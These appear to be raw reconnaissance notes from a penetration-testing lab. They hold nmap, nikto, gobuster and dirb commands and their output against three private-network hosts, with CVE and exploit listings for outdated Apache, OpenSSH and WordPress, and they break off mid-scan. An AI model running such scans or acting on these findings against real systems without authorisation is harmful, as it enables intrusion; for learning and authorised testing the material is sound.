3306/tcp open mysql MySQL 5.7.35
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=11/19%OT=22%CT=1%CU=33207%PV=Y%DS=2%DC=I%G=Y%TM=6378B0
OS:82%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=2%ISR=10D%TI=Z%TS=A)OPS(O1=M5B4S
OS:T11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M
OS:5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y
OS:%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=
OS:)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R
OS:=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=
OS:G)IE(R=N)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.55 seconds
sudo nmap -sUV -T4 -p1-1000 --version-intensity 0 192.168.110.72 -oA machines/192_168_110_72/enumeration/nmap/nmap_udp_fullfast
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-20 18:15 CET
Nmap scan report for 192.168.110.72
Host is up (0.00066s latency).
Not shown: 936 closed ports, 63 open|filtered ports
PORT STATE SERVICE VERSION
69/udp open tftp?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port69-UDP:V=7.91%I=0%D=11/20%Time=637A645A%P=x86_64-pc-linux-gnu%r(DNS
SF:StatusRequest,40,"Welcome\x20to\x20UDP\x20backup\x20server\x20by\x20hax
SF:x0r\x20v0\.1,\x20say\x20help\x20for\x20help\.\n");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 935.78 seconds
Wordpress 6.1.1
nikto -h 192.168.110.72
---------------------------------------------------------------------------
+ Target IP: 192.168.110.72
+ Target Hostname: 192.168.110.72
+ Target Port: 80
+ Start Time: 2022-12-10 09:22:10 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ Retrieved x-powered-by header: PHP/7.4.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.110.72/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a differnt fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /wp-app.log: Wordpress' wp-app.log may leak application/system details.
+ /wordpresswp-app.log: Wordpress' wp-app.log may leak application/system details.
+ /: A Wordpress installation was found.
+ /wordpress: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7919 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time: 2022-12-10 09:30:59 (GMT1) (529 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
gobuster dir -u http://192.168.110.72/:80 -w /usr/share/wordlists/dirb/common.txt 1 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.110.72/:80
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/12/10 10:07:28 Starting gobuster in directory enumeration mode
===============================================================
/atom (Status: 301) [Size: 0] [--> http://192.168.110.72/:80/feed/atom/]
/feed (Status: 301) [Size: 0] [--> http://192.168.110.72/:80/feed/]
/h (Status: 301) [Size: 0] [--> http://192.168.110.72/2021/08/21/hello-world/]
/H (Status: 301) [Size: 0] [--> http://192.168.110.72/2021/08/21/hello-world/]
/hello (Status: 301) [Size: 0] [--> http://192.168.110.72/2021/08/21/hello-world/]
/index.php (Status: 301) [Size: 0] [--> http://192.168.110.72/:80/]
/rdf (Status: 301) [Size: 0] [--> http://192.168.110.72/:80/feed/rdf/]
/rss (Status: 301) [Size: 0] [--> http://192.168.110.72/:80/feed/]
/rss2 (Status: 301) [Size: 0] [--> http://192.168.110.72/:80/feed/]
/S (Status: 301) [Size: 0] [--> http://192.168.110.72/sample-page/]
/s (Status: 301) [Size: 0] [--> http://192.168.110.72/sample-page/]
/sam (Status: 301) [Size: 0] [--> http://192.168.110.72/sample-page/]
/sample (Status: 301) [Size: 0] [--> http://192.168.110.72/sample-page/]
/sa (Status: 301) [Size: 0] [--> http://192.168.110.72/sample-page/]
===============================================================
2022/12/10 10:10:38 Finished
===============================================================
dirb http://192.168.110.72:80 -X .html,.php 130 ⨯
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Dec 10 09:45:22 2022
URL_BASE: http://192.168.110.72:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.html,.php) | (.html)(.php) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.110.72:80/ ----
+ http://192.168.110.72:80/index.php (CODE:301|SIZE:0)
+ http://192.168.110.72:80/readme.html (CODE:200|SIZE:7389)
+ http://192.168.110.72:80/wp-app.php (CODE:403|SIZE:0)
+ http://192.168.110.72:80/wp-atom.php (CODE:301|SIZE:0)
+ http://192.168.110.72:80/wp-commentsrss2.php (CODE:301|SIZE:0)
+ http://192.168.110.72:80/wp-config.php (CODE:200|SIZE:0)
+ http://192.168.110.72:80/wp-cron.php (CODE:200|SIZE:0)
+ http://192.168.110.72:80/wp-feed.php (CODE:301|SIZE:0)
+ http://192.168.110.72:80/wp-links-opml.php (CODE:200|SIZE:236)
+ http://192.168.110.72:80/wp-load.php (CODE:200|SIZE:0)
+ http://192.168.110.72:80/wp-login.php (CODE:200|SIZE:5396)
+ http://192.168.110.72:80/wp-mail.php (CODE:403|SIZE:2593)
+ http://192.168.110.72:80/wp-rdf.php (CODE:301|SIZE:0)
+ http://192.168.110.72:80/wp-register.php (CODE:301|SIZE:0)
+ http://192.168.110.72:80/wp-rss.php (CODE:301|SIZE:0)
+ http://192.168.110.72:80/wp-rss2.php (CODE:301|SIZE:0)
+ http://192.168.110.72:80/wp-settings.php (CODE:500|SIZE:0)
+ http://192.168.110.72:80/wp-signup.php (CODE:302|SIZE:0)
+ http://192.168.110.72:80/xmlrpc.php (CODE:405|SIZE:42)
-----------------
END_TIME: Sat Dec 10 09:51:36 2022
DOWNLOADED: 9224 - FOUND: 19
sudo nmap 192.168.110.72 -sV -oA 192_168_110_72/enumeration/nmap/ftp --script "safe and ftp-*" -sU -T5 -p69
Starting Nmap 7.91 ( https://nmap.org ) at 2022-12-11 07:32 CET
Nmap scan report for 192.168.110.72
Host is up (0.0014s latency).
PORT STATE SERVICE VERSION
69/udp open tftp?
| fingerprint-strings:
| AFSVersionRequest, Citrix, DNS-SD, DNSStatusRequest, DNSVersionBindReq, Kerberos, NBTStat, NTPRequest, NetMotionMobility, RPCCheck, SIPOptions, SNMPv1public, SNMPv3GetRequest, Sqlping, sybaseanywhere, xdmcp:
| Welcome to UDP backup server by haxx0r v0.1, say help for help.
| Help:
|_ You can download your backup by saying backup followed by your password.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port69-UDP:V=7.91%I=7%D=12/11%Time=63957997%P=x86_64-pc-linux-gnu%r(DNS
SF:StatusRequest,40,"Welcome\x20to\x20UDP\x20backup\x20server\x20by\x20hax
SF:x0r\x20v0\.1,\x20say\x20help\x20for\x20help\.\n")%r(RPCCheck,40,"Welcom
SF:e\x20to\x20UDP\x20backup\x20server\x20by\x20haxx0r\x20v0\.1,\x20say\x20
SF:help\x20for\x20help\.\n")%r(DNSVersionBindReq,40,"Welcome\x20to\x20UDP\
SF:x20backup\x20server\x20by\x20haxx0r\x20v0\.1,\x20say\x20help\x20for\x20
SF:help\.\n")%r(NBTStat,40,"Welcome\x20to\x20UDP\x20backup\x20server\x20by
SF:\x20haxx0r\x20v0\.1,\x20say\x20help\x20for\x20help\.\n")%r(Help,49,"You
SF:\x20can\x20download\x20your\x20backup\x20by\x20saying\x20backup\x20foll
SF:owed\x20by\x20your\x20password\.\n")%r(SIPOptions,40,"Welcome\x20to\x20
SF:UDP\x20backup\x20server\x20by\x20haxx0r\x20v0\.1,\x20say\x20help\x20for
SF:\x20help\.\n")%r(Sqlping,40,"Welcome\x20to\x20UDP\x20backup\x20server\x
SF:20by\x20haxx0r\x20v0\.1,\x20say\x20help\x20for\x20help\.\n")%r(NTPReque
SF:st,40,"Welcome\x20to\x20UDP\x20backup\x20server\x20by\x20haxx0r\x20v0\.
SF:1,\x20say\x20help\x20for\x20help\.\n")%r(SNMPv1public,40,"Welcome\x20to
SF:\x20UDP\x20backup\x20server\x20by\x20haxx0r\x20v0\.1,\x20say\x20help\x2
SF:0for\x20help\.\n")%r(SNMPv3GetRequest,40,"Welcome\x20to\x20UDP\x20backu
SF:p\x20server\x20by\x20haxx0r\x20v0\.1,\x20say\x20help\x20for\x20help\.\n
SF:")%r(xdmcp,40,"Welcome\x20to\x20UDP\x20backup\x20server\x20by\x20haxx0r
SF:\x20v0\.1,\x20say\x20help\x20for\x20help\.\n")%r(AFSVersionRequest,40,"
SF:Welcome\x20to\x20UDP\x20backup\x20server\x20by\x20haxx0r\x20v0\.1,\x20s
SF:ay\x20help\x20for\x20help\.\n")%r(DNS-SD,40,"Welcome\x20to\x20UDP\x20ba
SF:ckup\x20server\x20by\x20haxx0r\x20v0\.1,\x20say\x20help\x20for\x20help\
SF:.\n")%r(Citrix,40,"Welcome\x20to\x20UDP\x20backup\x20server\x20by\x20ha
SF:xx0r\x20v0\.1,\x20say\x20help\x20for\x20help\.\n")%r(Kerberos,40,"Welco
SF:me\x20to\x20UDP\x20backup\x20server\x20by\x20haxx0r\x20v0\.1,\x20say\x2
SF:0help\x20for\x20help\.\n")%r(sybaseanywhere,40,"Welcome\x20to\x20UDP\x2
SF:0backup\x20server\x20by\x20haxx0r\x20v0\.1,\x20say\x20help\x20for\x20he
SF:lp\.\n")%r(NetMotionMobility,40,"Welcome\x20to\x20UDP\x20backup\x20serv
SF:er\x20by\x20haxx0r\x20v0\.1,\x20say\x20help\x20for\x20help\.\n");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.08 seconds
sudo nmap 192.168.110.73 -sV -oA 192_168_110_73/enumeration/nmap/vuln --script vuln -T5 -p22,80
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 12:07 CET
Nmap scan report for 192.168.110.73
Host is up (0.00089s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.110.73
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.110.73:80/
| Form id: searchform
| Form action: /
|
| Path: http://192.168.110.73:80/
| Form id: searchform
|_ Form action: /
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-sql-injection: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-wnr1000-creds: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:apache:http_server:2.2.22:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
| SSV:60427 6.9 https://vulners.com/seebug/SSV:60427 *EXPLOIT*
| SSV:60386 6.9 https://vulners.com/seebug/SSV:60386 *EXPLOIT*
| SSV:60069 6.9 https://vulners.com/seebug/SSV:60069 *EXPLOIT*
| CVE-2012-0883 6.9 https://vulners.com/cve/CVE-2012-0883
| PACKETSTORM:127546 6.8 https://vulners.com/packetstorm/PACKETSTORM:127546 *EXPLOIT*
| CVE-2016-5387 6.8 https://vulners.com/cve/CVE-2016-5387
| CVE-2014-0226 6.8 https://vulners.com/cve/CVE-2014-0226
| 1337DAY-ID-22451 6.8 https://vulners.com/zdt/1337DAY-ID-22451 *EXPLOIT*
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| SSV:60788 5.1 https://vulners.com/seebug/SSV:60788 *EXPLOIT*
| CVE-2013-1862 5.1 https://vulners.com/cve/CVE-2013-1862
| SSV:96537 5.0 https://vulners.com/seebug/SSV:96537 *EXPLOIT*
| SSV:62058 5.0 https://vulners.com/seebug/SSV:62058 *EXPLOIT*
| SSV:61874 5.0 https://vulners.com/seebug/SSV:61874 *EXPLOIT*
| EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D 5.0 https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D *EXPLOIT*
| EDB-ID:42745 5.0 https://vulners.com/exploitdb/EDB-ID:42745 *EXPLOIT*
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
| CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
| CVE-2014-0098 5.0 https://vulners.com/cve/CVE-2014-0098
| CVE-2013-6438 5.0 https://vulners.com/cve/CVE-2013-6438
| CVE-2013-5704 5.0 https://vulners.com/cve/CVE-2013-5704
| 1337DAY-ID-28573 5.0 https://vulners.com/zdt/1337DAY-ID-28573 *EXPLOIT*
| CVE-2012-0031 4.6 https://vulners.com/cve/CVE-2012-0031
| SSV:60905 4.3 https://vulners.com/seebug/SSV:60905 *EXPLOIT*
| SSV:60657 4.3 https://vulners.com/seebug/SSV:60657 *EXPLOIT*
| SSV:60653 4.3 https://vulners.com/seebug/SSV:60653 *EXPLOIT*
| SSV:60345 4.3 https://vulners.com/seebug/SSV:60345 *EXPLOIT*
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2014-0118 4.3 https://vulners.com/cve/CVE-2014-0118
| CVE-2013-1896 4.3 https://vulners.com/cve/CVE-2013-1896
| CVE-2012-4558 4.3 https://vulners.com/cve/CVE-2012-4558
| CVE-2012-3499 4.3 https://vulners.com/cve/CVE-2012-3499
| CVE-2012-0053 4.3 https://vulners.com/cve/CVE-2012-0053
| CVE-2008-0455 4.3 https://vulners.com/cve/CVE-2008-0455
|_ CVE-2012-2687 2.6 https://vulners.com/cve/CVE-2012-2687
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 528.01 seconds
sudo nmap -sV -T4 -Pn -p- -O 192.168.110.73 -oA machines/192_168_110_73/enumeration/nmap/nmap_fullfast
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 11:31 CET
Nmap scan report for 192.168.110.73
Host is up (0.00067s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=11/19%OT=22%CT=1%CU=37201%PV=Y%DS=2%DC=I%G=Y%TM=6378B0
OS:A9%P=x86_64-pc-linux-gnu)SEQ(SP=FA%GCD=1%ISR=104%TI=Z%II=I%TS=A)OPS(O1=M
OS:5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%
OS:O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%
OS:DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%
OS:RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.13 seconds
sudo nmap -sUV -T4 -p1-1000 --version-intensity 0 192.168.110.73 -oA machines/192_168_110_73/enumeration/nmap/nmap_udp_fullfast
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-20 18:15 CET
Warning: 192.168.110.73 giving up on port because retransmission cap hit (6).
Nmap scan report for 192.168.110.73
Host is up (0.00077s latency).
All 1000 scanned ports on 192.168.110.73 are closed (972) or open|filtered (28)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1050.50 seconds
Wordpress 2.8
Apache 2.2.22
nikto -h 192.168.110.73
---------------------------------------------------------------------------
+ Target IP: 192.168.110.73
+ Target Hostname: 192.168.110.73
+ Target Port: 80
+ Start Time: 2022-12-11 06:58:45 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ /readme.html: This WordPress file reveals the installed version.
+ /: A Wordpress installation was found.
+ /wp-login.php: Wordpress login found
+ /wp-content/plugins/gravityforms/change_log.txt: Gravity forms is installed. Based on the version number in the changelog, it is vulnerable to an authenticated SQL injection. https://wpvulndb.com/vulnerabilities/7849
+ 7927 requests: 12 error(s) and 10 item(s) reported on remote host
+ End Time: 2022-12-11 07:00:48 (GMT1) (123 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
gobuster dir -u http://192.168.110.73/:80 -w /usr/share/wordlists/dirb/common.txt 1 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.110.73/:80
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/12/11 07:14:24 Starting gobuster in directory enumeration mode
===============================================================
===============================================================
2022/12/11 07:14:27 Finished
===============================================================
dirb http://192.168.110.73:80 -X .html,.php
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Dec 11 07:00:53 2022
URL_BASE: http://192.168.110.73:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.html,.php) | (.html)(.php) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.110.73:80/ ----
+ http://192.168.110.73:80/index.php (CODE:200|SIZE:6628)
+ http://192.168.110.73:80/readme.html (CODE:200|SIZE:9225)
+ http://192.168.110.73:80/wp-login.php (CODE:200|SIZE:2024)
+ http://192.168.110.73:80/xmlrpc.php (CODE:200|SIZE:42)
-----------------
END_TIME: Sun Dec 11 07:02:31 2022
DOWNLOADED: 9224 - FOUND: 4
sudo nmap 192.168.110.73 -sV -oA 192_168_110_73/enumeration/nmap/vuln --script vuln -T5 -p22,80
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 12:07 CET
Nmap scan report for 192.168.110.73
Host is up (0.00089s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.110.73
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.110.73:80/
| Form id: searchform
| Form action: /
|
| Path: http://192.168.110.73:80/
| Form id: searchform
|_ Form action: /
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-sql-injection: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-wnr1000-creds: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:apache:http_server:2.2.22:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
| SSV:60427 6.9 https://vulners.com/seebug/SSV:60427 *EXPLOIT*
| SSV:60386 6.9 https://vulners.com/seebug/SSV:60386 *EXPLOIT*
| SSV:60069 6.9 https://vulners.com/seebug/SSV:60069 *EXPLOIT*
| CVE-2012-0883 6.9 https://vulners.com/cve/CVE-2012-0883
| PACKETSTORM:127546 6.8 https://vulners.com/packetstorm/PACKETSTORM:127546 *EXPLOIT*
| CVE-2016-5387 6.8 https://vulners.com/cve/CVE-2016-5387
| CVE-2014-0226 6.8 https://vulners.com/cve/CVE-2014-0226
| 1337DAY-ID-22451 6.8 https://vulners.com/zdt/1337DAY-ID-22451 *EXPLOIT*
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| SSV:60788 5.1 https://vulners.com/seebug/SSV:60788 *EXPLOIT*
| CVE-2013-1862 5.1 https://vulners.com/cve/CVE-2013-1862
| SSV:96537 5.0 https://vulners.com/seebug/SSV:96537 *EXPLOIT*
| SSV:62058 5.0 https://vulners.com/seebug/SSV:62058 *EXPLOIT*
| SSV:61874 5.0 https://vulners.com/seebug/SSV:61874 *EXPLOIT*
| EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D 5.0 https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D *EXPLOIT*
| EDB-ID:42745 5.0 https://vulners.com/exploitdb/EDB-ID:42745 *EXPLOIT*
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
| CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
| CVE-2014-0098 5.0 https://vulners.com/cve/CVE-2014-0098
| CVE-2013-6438 5.0 https://vulners.com/cve/CVE-2013-6438
| CVE-2013-5704 5.0 https://vulners.com/cve/CVE-2013-5704
| 1337DAY-ID-28573 5.0 https://vulners.com/zdt/1337DAY-ID-28573 *EXPLOIT*
| CVE-2012-0031 4.6 https://vulners.com/cve/CVE-2012-0031
| SSV:60905 4.3 https://vulners.com/seebug/SSV:60905 *EXPLOIT*
| SSV:60657 4.3 https://vulners.com/seebug/SSV:60657 *EXPLOIT*
| SSV:60653 4.3 https://vulners.com/seebug/SSV:60653 *EXPLOIT*
| SSV:60345 4.3 https://vulners.com/seebug/SSV:60345 *EXPLOIT*
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2014-0118 4.3 https://vulners.com/cve/CVE-2014-0118
| CVE-2013-1896 4.3 https://vulners.com/cve/CVE-2013-1896
| CVE-2012-4558 4.3 https://vulners.com/cve/CVE-2012-4558
| CVE-2012-3499 4.3 https://vulners.com/cve/CVE-2012-3499
| CVE-2012-0053 4.3 https://vulners.com/cve/CVE-2012-0053
| CVE-2008-0455 4.3 https://vulners.com/cve/CVE-2008-0455
|_ CVE-2012-2687 2.6 https://vulners.com/cve/CVE-2012-2687
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 528.01 seconds
sudo nmap -sV -T4 -Pn -p- -O 192.168.110.80 -oA machines/192_168_110_80/enumeration/nmap/nmap_fullfast
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 11:32 CET
Nmap scan report for 192.168.110.80
Host is up (0.00059s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
3306/tcp open mysql MySQL 8.0.26-0ubuntu0.20.04.2
8080/tcp open http Apache httpd 2.4.41 ((Ubuntu))
8443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (92%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10
Aggressive OS guesses: Linux 4.15 - 5.6 (92%), Linux 5.0 - 5.4 (92%), Linux 2.6.32 or 3.10 (92%), Linux 5.0 - 5.3 (90%), Linux 5.4 (90%), Linux 4.0 (90%), Linux 2.6.32 (90%), Linux 4.4 (90%), Linux 2.6.32 - 2.6.35 (88%), Linux 2.6.32 - 2.6.39 (87%)
